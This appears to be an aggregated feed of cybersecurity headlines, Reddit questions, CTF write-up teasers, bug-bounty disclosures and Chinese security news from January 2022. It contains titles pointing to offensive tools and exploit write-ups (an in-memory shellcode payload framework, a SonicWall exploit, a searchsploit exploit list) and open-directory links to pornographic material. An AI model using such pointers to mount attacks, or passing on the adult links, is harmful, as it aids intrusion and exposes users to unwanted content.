    I'm given the following network address - 209.165.201.0 /24. If I'm splitting this network into two, LAN1 will have 29 hosts and LAN2 with 17 hosts. What I did to subnet this network was incorrect but I don't know the correct answer. I thought LAN1 would have an IP of 209.165.201.0 /27 and LAN 2 would be 209.165.201.33 /27, but from what I understand now is that these subnets cannot share the same CIDR. How would you go about doing this? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Potential Risk from Using Bluetooth Headset on a company laptop?
    My company provides work laptops and headsets. However they don't have option for wireless headsets, only wired ones. They also advise against connecting any non company authorised peripherals to the laptop. I am wondering though, what would be realistic risks from connecting a Bluetooth headset to a laptop? submitted by /u/rw1337 [link] [comments]  ( 3 min )
    Internship Questions
    About a month after getting my CCNA training, I have my first interview for an internship in a well-known MNC bank in the networking field, and I'm terribly nervous. Guys, can you help me with some common questions asked in a bank networking interview? submitted by /u/Aggressive-Dot-7339 [link] [comments]  ( 1 min )
    Best Identity Theft services for Companies
    In your experience what are the best Identity Theft services for Companies/Brands (not for individuals)? I am talking of services like: Identity Guard, LifeLock, IdentityForce, Watchdog. Thanks for the answers. submitted by /u/NerdSupremacist [link] [comments]  ( 2 min )
    Scanning for Network Listening Device - What is Blackice?
    Hey all, first of all, thanks for any help anyone can provide. I have a limited background in network security understanding from my undergrad in computer science, but have not dipped my toes in seriously in a while, so kinda stumbling through trying to figure this out. A friend asked me to check their network for any rogue listening devices and after a quick scan with Nmap, I came across this device on 192.168.0.1 described as "blackice-icecap". A quick google search makes it sound like this might actually be some kind of device set up to monitor network traffic. Is this something that is worth digging deeper into or am I misunderstanding this? What other avenues for rogue network monitoring should I be looking into? My first thought is that this is all probably a bit over my head, but I thought I'd at least give it a quick peek to see if I can find anything obvious to help my friend out. Thanks again for any feedback or advice. For reference, here is the relevant part of the Nmap result:
    Nmap scan report for 192.168.0.1
    Host is up (0.033s latency).
    Not shown: 995 closed tcp ports (conn-refused)
    PORT STATE SERVICE
    80/tcp open http
    443/tcp open https
    5000/tcp open upnp
    8081/tcp filtered blackice-icecap
    8082/tcp filtered blackice-alerts
    submitted by /u/wwants [link] [comments]  ( 1 min )
    Using mobile hotspot on my laptop. Where do I turn on VPN - phone or laptop?
    Hi all. Simple question but very hard to find the answer. When I don't have access to good wifi, I'm going to be using mobile hotspot to access the internet on my laptop. Question is, where do I turn on my VPN - on my laptop? Or on my phone? Or just to be safe, on both? submitted by /u/AliveandDrive [link] [comments]  ( 3 min )
    Password Cracking LDS
    Has anyone ever done a password audit against an Active Directory LDS server (not regular AD server)? If so, any directions on how to extract the hashes using standard tools like ImPacket or DSInternals? We have a procedure to crack our AD passwords using these tools but LDS seems to be a slightly different beast. submitted by /u/clayjk [link] [comments]  ( 1 min )
    Best way to remove card from multiple services?
    I would like to unlink my card details on various services. It would be kind of a lot of work to login to each service and delete that info. Is there another way? Would just getting a new card be a good option? submitted by /u/extremexample [link] [comments]  ( 2 min )
    Can the operators of SS7s pull SMSs from carriers in the US at will?
    Provocative title, I know. "At will" is subjective. It was claimed in a post yesterday and today that this is something that SS7 operators can do (which is true). I talked to a security researcher (Lucky 225 on Twitter) who told me that the US is more locked down than other countries and phones 2014+ are using LTE implying that maybe most phones in the US aren't vulnerable to this. Of course, he's not a god and not omnipotent as none of us are. There are things that he doesn't know (as is the case for us all). Does anyone have more information on this that could clarify the extent of the vulnerability in terms of location, G (2G, 3G, etc) and limitations so we can know what we might be vulnerable to? Obviously, getting access to an SS7 is WAY harder than a smartphone, sim card and someone's personal info so maybe this isn't the biggest threat, but still... submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
  • Open

    Cybrary
    Hello, I’m currently pursuing my BS in Computer Forensics and Digital Investigation. I came across Cybrary and was wondering if that can help me practice more on the subject? I still feel very lost when taking college courses; I want to get more practice in and just want to know if Cybrary is worth the annual membership. If anyone has some tips on what courses to take there or other sites I would appreciate it. Thank you in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
    Investigating Message Read Status in Gmail & Google Workspace
    submitted by /u/No_Reflection_3360 [link] [comments]  ( 1 min )
    Interview questions
    So I read the FAQ and went through the SANS link which is posted to prepare for interviews in forensics. I am a recent graduate with a DF degree, and I had my first interview the other day but I am wondering what I could expect for the technical portion of the interview. Are there certain artifacts or definitions I should make sure I’m familiar with that can help? Or any common scenario questions that get asked? I apologize if this isn’t the right place to ask this. submitted by /u/investtam [link] [comments]  ( 2 min )
  • Open

    Playing with Kerberos tickets (Host service)
    I’m going to share the results of some experimentation with Kerberos tickets. I’m sorry if this doesn’t add any new value or someone else… Continue reading on System Weakness »  ( 8 min )
  • Open

    Where can I learn windows binary exploitation from the basics?
    submitted by /u/wlo1337 [link] [comments]  ( 1 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, particularly web-based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    SecWiki News 2022-01-12 Review
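    Gartner 2021 Market Guide for Vulnerability Assessment by ourren Quick reference to emerging cybersecurity segments and vendors · Cyber Security Billboard by ourren An analysis of cyberspace mapping and attribution techniques by ourren A survey of research on cyberspace threat hunting by ourren Chang'an "Battle Against the Epidemic" - WriteUp by ourren APT Group Intelligence Research Yearbook 2021 by ourren For more of the latest articles, visit SecWiki  ( 2 min )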
  • Open

    Preventing Broken Access Control: The No.1 OWASP Vulnerability in 2021
    Article URL: https://www.synack.com/blog/preventing-broken-access-control-the-no-1-vulnerability-in-the-owasp-top-10-2021/ Comments URL: https://news.ycombinator.com/item?id=29908197 Points: 3 # Comments: 0  ( 6 min )
  • Open

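    FreeBuf Morning News | EU to launch large-scale supply chain security exercise; security flaw reported in Tesla car software
    A security researcher says some Tesla car software has a "serious" flaw that makes it possible to remotely unlock the vehicle's doors and windows, start the vehicle without a key, and disable the security system.  ( 1 min )
    Process guide for assessing GaussdDB (Huawei GaussDB database) in a Classified Protection 2.0 secure computing environment
    An assessment guide from a GaussDB database evaluation on a Huawei private cloud  ( 1 min )
    Small and medium-sized enterprises easily become targets of cyberattacks
    51% of small and medium-sized enterprises have experienced a cybersecurity breach, and the resulting cybercrime has become a problem in urgent need of a solution.
    Great Wall Motor is hiring multiple security professionals
    Great Wall Motor is a Chinese automotive brand founded in 1984 and is hiring multiple security professionals.  ( 1 min )
    The application and implementation of cryptographic technology in personal information compliance
    Implementing personal information compliance, especially the obligation to safeguard personal information, is not only a legal problem but also an information security technology problem.  ( 1 min )
    New variant of the RedLine info-stealer! Spreading disguised as an Omicron case counter
    RedLine targets information such as user account credentials stored in browsers.  ( 1 min )
    Tophant PRS-NTA passes Huawei Kunpeng 920 compatibility certification
    Committed to Xinchuang (IT application innovation), Tophant continues to deepen cooperation in the domestic-technology ecosystem.
    Firefox Focus for Android enhances privacy protection, blocking cross-site tracking
    Firefox Focus for Android has further strengthened its privacy protections, preventing cookies from being used for advertising and for analyzing user behavior, thereby protecting users from cross-site tracking while they browse.  ( 1 min )
    Examples of common encryption methods
    Usually, when we are testing for logic vulnerabilities or writing crawlers and run into front-end encryption, we can choose to pull out the encryption algorithm and encrypt the parameters we are debugging ourselves.  ( 10 min )
    Microsoft: powerdir vulnerability allows access to macOS user data
    Microsoft has announced that threat actors can exploit a macOS vulnerability to bypass the Transparency, Consent, and Control (TCC) framework and access users' protected data.  ( 1 min )
    Notes on industrial cyber ranges (7) | Outlook on development trends
    Digital transformation is accelerating the convergence of OT and IT, and at the same time the cybersecurity risks of OT/IT convergence are evolving in step.  ( 1 min )
    Hackers use vulnerabilities to wipe out debts: how to "know early" about this kind of vulnerability
    Using vulnerabilities to wipe out debts, steal data, or obtain login access to every account of game XX with one click: these "slick moves" that seem to come straight from wish-fulfilment fiction have in fact long been playing out in reality.  ( 1 min )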
  • Open

    How to attack Offensive Security Web Expert (OSWE)
    In this article, we will discuss one of the toughest exams from Offensive Security, the web expert one (OSWE). Continue reading on Medium »
    Bug Bounty Methodology — Horizontal Enumeration
    While performing a security assessment our main goal is to map out all the domains owned by a single entity. This means knowing all the… Continue reading on Medium »  ( 3 min )
    Xiaomi Arbitrary JavaScript Vulnerability
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    Learning prerequisites for hacking and bug bounty?
    Hey computer geeks. I am writing this because I have faced many problems in getting started in “cyber security” because I don’t know where… Continue reading on Medium »  ( 3 min )
    Attacking ARP: Learn Networking By Breaking Stuff For Bug Bounty Hunters, Penetration Testers, and…
    An introduction to the fundamentals of one of the most important protocols on the internet and the methodology to exploit it for fun and… Continue reading on Dev Genius »  ( 5 min )
    Subdomain Enumeration — The Right way (Prerequisites)
    So, I have seen various articles about subdomain enumeration and decided to make one in detail without confusing everyone with various… Continue reading on Medium »  ( 3 min )
  • Open

    Friend Request Flow Exposes User Data
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245741 - Bounty: $750
    Account Takeover via SMS Authentication Flow
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245762 - Bounty: $1750
    CSRF to change password
    Nord Security disclosed a bug submitted by paramdham: https://hackerone.com/reports/204703 - Bounty: $300
    Clickjacking to change email address
    Gener8 disclosed a bug submitted by paramdham: https://hackerone.com/reports/783191

  • Open

    CyberDefenders | L’espion
    The OSINT write-ups Continue reading on InfoSec Write-ups »  ( 3 min )
    What is OSINT
    Have you been trying to find someone online, specifically perhaps by using an email addresses, or username? Continue reading on Medium »  ( 7 min )
    Using fitness tracker apps for OSINT purposes
    The smartwatches and fitness trackers we wear know a myriad of information about us… From the places we visit, our coordinates, our health… Continue reading on Medium »  ( 5 min )
    OSINT: Open Source Intelligence
    If you’ve heard the name but are wondering what it means, OSINT stands for open source intelligence, which refers to any information that… Continue reading on Medium »  ( 3 min )
  • Open

    CVE-2021-45608 – NetUSB RCE Flaw in Millions of End User Routers
    Article URL: https://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers/ Comments URL: https://news.ycombinator.com/item?id=29897289 Points: 3 # Comments: 0  ( 6 min )
    Windows HTTP Protocol Stack RCE Vulnerability (CVE-2022-21907)
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 Comments URL: https://news.ycombinator.com/item?id=29896565 Points: 3 # Comments: 2
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    Article URL: https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038 Comments URL: https://news.ycombinator.com/item?id=29891670 Points: 1 # Comments: 0  ( 24 min )
  • Open

    Finding vulnerabilities in LoRaWAN's Protocol Stacks: Emulation with Qiling/Unicorn, P-Code emulation with Ghidra and AFL++ Fuzzing (Quick summary + complete 40 pages paper)
    submitted by /u/sebazzen [link] [comments]  ( 1 min )
    How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more.
    submitted by /u/jat0369 [link] [comments]
    Risk-aware applications
    submitted by /u/TolgaDevSec [link] [comments]
    Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory. Ivy’s loader does this by utilizing programmatical access in the VBA object environment to load, decrypt and execute shellcode.
    submitted by /u/tylous [link] [comments]  ( 1 min )
    CVE-2021-41577: MITM to RCE in EVGA Precision X1
    submitted by /u/hackers_and_builders [link] [comments]  ( 1 min )
    Writing an Exploit for CVE-2021-20038 (SonicWall SSL VPN)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
  • Open

    How I downed acronis.com in 2 minutes — Lucky bug write up
    Hi bug hunters!! Continue reading on Medium »  ( 1 min )
    Linux Privilege Escalation Resources
    Hey guys, I hope you're doing well. Today I share some Linux priv esc resources that help you in solving CTF and in web-pentesting and… Continue reading on Medium »  ( 1 min )
    ODDZ Incentivized Testnet : Airdrop And Bug Bounty Program
    Oddz Finance’s Options V1 Already Live On Binance Smart Chain Mainnet And Completed Testnet On Polygon Matic Chain. Continue reading on Medium »  ( 1 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control Continue reading on InfoSec Write-ups »  ( 2 min )
    Mintverse Beta 2.0 Bug Bounty Program
    Dear Mintverse community, Continue reading on Mintverse »  ( 2 min )
    Bug Bounty Methodology - Web Vulnerabilities Checklist
    Hello guys, it’s me again. I know malware analysis might be boring because of debugging and code analysis especially for the people who… Continue reading on Medium »  ( 2 min )
    Starting My Journey
    Hi Welcome to Bug University, I welcome you all to my blog site… Continue reading on Medium »
    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Admin Login Bypass in a Coaching system
    Hello readers, I am Aditya. Recently, hunting around in a coaching site, I found a critical bug at… Continue reading on Medium »  ( 1 min )
  • Open

    Red Team vs Blue Team: understand the difference
    Just as a football team has attack and defense, in cybersecurity the idea is similar. Continue reading on Yaman Tecnologia »  ( 2 min )
    OFFENSIVE SECURITY TOOLS FOR PENTESTING & RED TEAM OPERATIONS
    Every so often I post a tweet on Twitter asking for people’s arsenal of different tools whether for security, coding or whatever. Continue reading on Medium »  ( 1 min )
  • Open

    Prototype pollution via console.table properties
    Node.js disclosed a bug submitted by rugvip: https://hackerone.com/reports/1431042
  • Open

    Kernel ROP gadgets ARM
    Hello guys, I am trying to port a kernel exploit and I need to find ROP gadgets from vmlinux. This is not accessible in the target and as far as I understand uboot loads the vmlinux on boot, but this restricts me from easily finding the gadgets I need. Is there any resource you can suggest, as I'm clearly missing something and my research till now didn't give me clear answers? Thanks :D submitted by /u/Cr0wTom [link] [comments]  ( 1 min )
    Wfuzz VS ffuf - Which one is the faster web fuzzing tool? [Web Security #1]
    submitted by /u/pat_ventuzelo [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-11 Review
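    Malicious website identification with a GCN model based on a heterogeneous graph of cross-site redirects and text data by ourren Detecting reflection-amplification DDoS attacks at Internet exchange points by Avenger For more of the latest articles, visit SecWiki  ( 2 min )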
  • Open

    Career growth and related certification
    I've been working as a security tester (pentester) for about a year. I've done CEH V10 and this year I really want to be improved bling on my resume tbh. I am currently doing web mobile pos testing. Your help would be really appreciated in suggesting good value for money and information certificates. I know OSCP is there but I need more hands on for that which I am working on but in the mean time don't want to lose time. I have a potential interest in cloud security but also open to other fields and certification. submitted by /u/light_striker12 [link] [comments]  ( 2 min )
    Tips for making malware lab for school project
    Going to use https://github.com/ytisf/theZoo malwares. Maybe use Splunk to write alerts, queries etc to identify the malwares. (Problem is that it only got 60 days trial, need at least for 6 months) Should I be worried for VM escape, if I run these malware in a secure VM environment? What should be the main focus of this project. Run the malware then just identify them with alerts and write writeups? Would this idea be great for a university project for 6 months? submitted by /u/PapiPoseidon [link] [comments]  ( 3 min )
    Strange log activity
    Has anyone ever seen Windows event 1102 (The audit log was cleared) activity on a Windows server that was performed by SYSTEM? It happened on a test VM I built and I can't figure out why that would happen. I have backups of the logs and compared the logs on the server with the backup and a few 100 logs were deleted but they were future dated logs (which doesn't make sense). I'm sure it's not a timezone issue, the logs were dated 15 hours into the future. Almost like they were a mistake and the system fixed it? I have basically nothing running on the server (something I built for testing) but would love to understand what happened. Thanks! submitted by /u/forthebeer2000 [link] [comments]  ( 1 min )
    How to remove root certificates from work
    I recently started a new job at a government facility with a BYOD policy at work. Without thinking, I used my personal phone and logged in to the wifi which required me to accept root certificates. I am now aware that all my traffic can be decrypted and anything on my personal phone can be monitored on any network. I wish to keep my personal privacy and use a separate device for work now. How can I reset my phone to remove the root certificates? As I understand it, a standard factory reset may not work if the cert provided superuser permissions. Would a stock ROM install remove the root cert? submitted by /u/lloptty774 [link] [comments]  ( 1 min )
  • Open

    Invicti Security Names Jeff Bray Chief Financial Officer
    Invicti Security today announced seasoned financial executive Jeff Bray has joined the company as Chief Financial Officer. Bray brings decades of experience leading world-class finance teams in both private and public software companies and will lead all aspects of Invicti’s financial operations. READ MORE  ( 2 min )
  • Open

    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
    Generating & Analyzing Shellcode with Radare2
    submitted by /u/DLLCoolJ [link] [comments]  ( 1 min )
  • Open

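    My Journey Learning Penetration Testing: Java Deserialization, the CB Chain
    Strictly speaking, this article is part of my study notes on Java gadget chains.  ( 1 min )
    An Article on PHP Deserialization
    An article on PHP deserialization  ( 1 min )
    FreeBuf Morning Briefing | Multiple EA Sports FIFA 22 players hacked; e-waste is also a cybersecurity problem
    Several EA Sports FIFA 22 players appear to have been hacked and say they have lost access to their personal EA and email accounts.  ( 1 min )
    Interview with the head of Alibaba Cloud SASE: making office security simpler
    Can SASE really deliver on Gartner's prediction that it "can replace existing network and security models"? How was Alibaba Cloud SASE built, and what changes can it bring to enterprises?  ( 1 min )
    Europol ordered to delete data unrelated to criminal investigations
    On January 3, the European Data Protection Supervisor required Europol to delete large amounts of stored personal data that has no clear link to criminal investigations.
    Multiple EA Sports FIFA 22 players attacked
    A growing number of EA Sports FIFA 22 players report that their EA accounts have been hacked and that they cannot access their personal EA and email accounts; well-known streamers are among them.  ( 1 min )
    Facebook launches "Privacy Center" to educate users about data collection and privacy options
    The maze-like menus and obscure wording make people doubt how effective it is at protecting user data.  ( 1 min )
    The contest between "immunity" and "virus" in cyberspace
    Cyber risk, like "patient zero", is a moving research subject. It is not easily pinned down in one attempt and has to be approached step by step through searching, judging, affirming and self-negation, which is the process of coming to understand the "virus".
    The "fragile" Internet of Vehicles
    Compared with the fast-moving connected-vehicle industry, connected-vehicle security is clearly painstaking work; automakers must learn to slow down and dig in before they can truly solve connected-vehicle security problems.  ( 1 min )
    2021 Cryptomining Trojan Trend Report
    Sangfor's threat intelligence team continuously tracked active cryptomining trojan families using cloud data, detected multiple cryptomining trojan outbreaks, and from them analysed and summarised some development trends of cryptomining trojans.  ( 1 min )
    Defining "important data" in light of China's existing laws and regulations
    2021 is over. Looking back at the end of the year on what I did over the past year, what left the deepest impression was the term "data security".  ( 1 min )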
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Lot Of IT-Related Books.
    https://doc.lagout.org/ submitted by /u/AdministrativeDig391 [link] [comments]  ( 1 min )

  • Open

    Trying to find a way to see when a user account that is now deleted, was first created. Is that possible?
    So the HDD, which ran XP, doesn’t boot anymore. I can access the files however. I’m trying to find when a specific account was created on this drive. It was created from the original admin account, which also was deleted and replaced later on. The user account files of the first admin account were saved, but nothing of the account that I’m looking for. The guest account is still the same guest account with files from when it used to be mine. So it wasn’t factory reset or anything. Am I out of luck for figuring out when the deleted account I’m looking for was created? submitted by /u/Pubh12 [link] [comments]  ( 2 min )
    Deleted texts in an iTunes backup
    Hi all, I believe I already know the answer to a hypothetical scenario but I wanted some clarity on deleted texts via an iTunes backup. From a general perspective, say a user has a modern iPhone and deleted hundreds of text messages then backed up their iPhone using iTunes. Would some or even most of those deleted texts be found in the backup? I realize time and usage of the iPhone would affect what may get backed up, but let’s say they deleted a bunch of texts then created the iTunes backup right after. I imagine since the entire sms.db is getting backed up, the texts marked for deletion would still reside in the database / get backed up. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]  ( 2 min )
  • Open

    Active Directory Privilege Escalation (CVE-2021–42278)
    This post discusses how CVE-2021-42287 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any The post Active Directory Privilege Escalation (CVE-2021–42278) appeared first on Hacking Articles.  ( 4 min )
  • Open

    What is an SS7 attack and how does it work?
    I made the post about the IMSI Catchers and someone brought this up. submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    I clicked a phishing scam link.. can I get rid of the program it downloaded on my iPhone?
    I clicked a link in a text it downloaded something on my phone that I can’t find. My iPhone can’t make calls now.. I double clicked my home button during a call and something glitched.. I saw an app open that is not showing on my phone, it was transparent and said “screen sharing”. I wasn’t able to go into the app then it disappeared. I’m 99% sure someone can see everything I do on my iPhone. Do I need to go to T-Mobile and get a new phone? Edit: every time I make a call it fails and the speaker/audio button is always not able to be selected. But the speaker button will turn on then call fails. Here is a picture of the screen sharing: https://imgur.com/a/HjsY767 submitted by /u/Acrobatic-Path2242 [link] [comments]  ( 2 min )
    remote network pentest connectivity
    Hello Netsec engineers, I have an 'internal' remote pentest coming up for a client who doesn't have a spare computer in their office or a virtual computer. They would like to simulate an attack as if someone walked into the office and dropped a raspberry pi. I have a laptop ready for deployment that will be connected via LAN in the client's office, what would be the best way for me to remote into the laptop? In the past I've used TeamViewer but that hasn't been great display wise, the reliability never dropped though which is the most important. Would it be worth getting a VPS and configuring my own VPN using openvpn for tests like this? submitted by /u/HotHeadStayingCold [link] [comments]  ( 4 min )
    SANS SEC560 (Network Penetration Testing and Ethical Hacking) Preparation?
    My job is offering to pay for a SANS training of my choice. I passed the SEC401 earlier this year but I have no experience with penetration testing or anything of the sort. I realize I'll have to fill some information gaps myself to get the most out of this course. Where should I start? Thanks in advance. submitted by /u/Lorian-onii-chan [link] [comments]  ( 1 min )
    Another Microsoft account has established ownership of number message?
    got this message was I hacked? or is there something I am missing Another Microsoft account has established ownership of 12176. If you no longer own 121176, we can help you set up another sign-in name the next time you sign in to your Microsoft account. If 12176 still belongs to you, we can help you reclaim it. I cut out the number just in case I actually had this number at one point but what does this mean. I already suspect my brother is behind this because we are at war and he has accessed my Gmail constantly, and I just removed a few devices from my Gmail because it said I had a MacBook which I don't and he's in the IT field, and has google nest in our house he bought for our mother I'm thinking he's manipulating that to steal my credentials as well but I'm not sure. So long story short I cleaned up all possible security breaches my chump brother might have had control over and this happens I'm thinking he was on my Microsoft account because he jumps in my online COD Lobbys with lame attempts to insult me lol submitted by /u/TheGoodJosh [link] [comments]  ( 1 min )
    Best way to inspect IoT device traffic?
    I also suppose the biggest challenge would be getting the devices to trust a self signed certificate. submitted by /u/earthlyaeon [link] [comments]  ( 1 min )
  • Open

    Another MSX directory.
    http://www.msxarchive.nl/pub/msx/ submitted by /u/EmuAnon34 [link] [comments]
    micro bikini oil dance collection
    http://www.wo-fd.xyz/?/Microbikini%20Oily%20Dance%20Ultimate%20Collection%20%5BOmega%20P%5D/ ​ And a butt load more xxx up 1 directory https://preview.redd.it/446vp7vpkta81.png?width=1920&format=png&auto=webp&s=964e053e72ab80490463e4acdb150f24b59acfec submitted by /u/Hyp3rionX [link] [comments]
    xxx od
    http://107.178.111.146:9999/ gay porn submitted by /u/Hyp3rionX [link] [comments]
  • Open

    Abusing terminal emulators with ANSI escape characters can lead to remote DDoS, character injection and more.
    submitted by /u/jat0369 [link] [comments]  ( 1 min )
    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    ProtonVPN TCP Acceleration SYN+ACK Spoofing Analysis
    submitted by /u/netsecfriends [link] [comments]  ( 2 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    Must-Have Tools For Hacking
    submitted by /u/banginpadr [link] [comments]
  • Open

    FTC Says Fix Log4j Security Vulnerability or Face Its Wrath
    Article URL: https://thenewstack.io/ftc-says-fix-log4j-security-vulnerability-or-face-its-wrath/ Comments URL: https://news.ycombinator.com/item?id=29879106 Points: 3 # Comments: 0
    New macOS vulnerability, “powerdir,” could lead to unauthorized user data access
    Article URL: https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/ Comments URL: https://news.ycombinator.com/item?id=29879030 Points: 5 # Comments: 0  ( 11 min )
  • Open

    OSINT Challenge — find the mural
    I have stumbled upon the Twitter account of OSINTDojo and their challenge to find a certain mural along with the respective artist… Continue reading on Medium »  ( 2 min )
    TryHackMe — OhSINT Walkthrough
    OhSINT is a free room on the TryHackMe platform. The objective of this challenge is to use open-source intelligence techniques to obtain… Continue reading on Medium »  ( 2 min )
  • Open

    FTC words of warning: Remediate recent Log4j vulnerabilities or face consequences
    The FTC has issued a warning to companies straggling behind on Log4j: remediate this flaw or face legal consequences. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    SecWiki News 2022-01-10 Review
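    SecWiki Weekly (Issue 410) by ourren Rootkit research series: highly stealthy, highly persistent threats on the Windows platform by ourren Ten typical cases of personal-information infringement in 2021 by ourren For more recent articles, visit SecWiki  ( 2 min )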
  • Open

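    "Cybersecurity Knowledge Continent" 1.0 officially launched!
    The official 1.0 release of "Cybersecurity Knowledge Continent", which gathers high-quality content in one place, has arrived.
    FreeBuf Morning Briefing | Ministry of Public Security publishes ten typical personal-information crime cases; Facebook launches Privacy Center
    Public security organs nationwide solved more than 9,800 cases of infringement of citizens' personal information over the year, arrested 17,000 suspects, and published the ten typical cases of crimes infringing citizens' personal information in 2021.  ( 1 min )
    SNMP service attacks in practice
    The SNMP service in switch security configuration  ( 1 min )
    "Bookmark edition" roundup: 2021 policies and regulations, national standards, reports and white papers
    This article comprehensively compiles the main domestic policies and regulations issued in 2021, some national standards, and research reports and white papers from major institutions.  ( 1 min )
    Casual talk: "three-administrator" management under classified protection
    The system administrator, audit administrator and security administrator roles must not all be held by one person; ideally three people hold them separately.
    "Shanghai Counter-Espionage Security Precaution Regulations" released, in force from January 1, 2022
    The "Shanghai Counter-Espionage Security Precaution Regulations" comprise seven chapters and thirty-five articles, further improving the legal framework for counter-espionage security precautions and safeguarding national security in accordance with the law.
    Night Sky, a new ransomware targeting enterprises
    Security researchers recently warned that a new ransomware named "Night Sky" is active; it targets corporate networks and steals data in double-extortion attacks.  ( 1 min )
    Online booking platform FlexBooker leaks data of more than 3.7 million accounts
    FlexBooker advises users to stay vigilant and to review account statements and credit reports for suspicious transactions.  ( 1 min )
    Gin-Vue-admin vertical privilege escalation vulnerability and code analysis - CVE-2022-21660
    Users get the chance to exceed their privileges ultimately because of a logic flaw in the code.  ( 3 min )
    France fines Google and Facebook a hefty 210 million euros for violating privacy rules
    France fined Facebook and Google 150 million euros and 60 million euros respectively, on the grounds that they did not give users a simple option to refuse cookie tracking technology.  ( 1 min )
    Reverse engineering tutorial (3): four ways to quickly locate specific code
    When debugging code, the main() function is not located directly at the executable's EP; what appears there is the startup function generated by the development tool (Visual C++).  ( 1 min )
    Reverse engineering tutorial (1): debugging code
    This series of articles is a summary aimed at those preparing to get started with reverse engineering. Come and learn together!  ( 1 min )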
  • Open

    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Exploiting Execute After Redirect (EAR) vulnerability in HTB Previse
    Exploiting Execute After Redirect for fun and profit?? Continue reading on InfoSec Write-ups »  ( 2 min )

  • Open

    searchsploit vs msfconsole exploit names
    Hi! Let's say I am looking for some webmin exploit through searchsploit:
    searchsploit webmin
    ---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    Exploit Title | Path
    ---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
    DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt
    phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt
    phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt
    Webmin - Brute Force / Command Execution | multiple/remote/705.pl
    webmin 0.91 - Directory Traversal | cgi/remote/21183.txt
    Webmin …  ( 2 min )
    I've read about IMSI catchers being a security threat, but I'm not sure I should actually be worried about them. If someone grabbed an IMSI# with an IMSI catcher, how would they get any usable information about me? Is my personal information at risk or is this just a random unusable string to most?
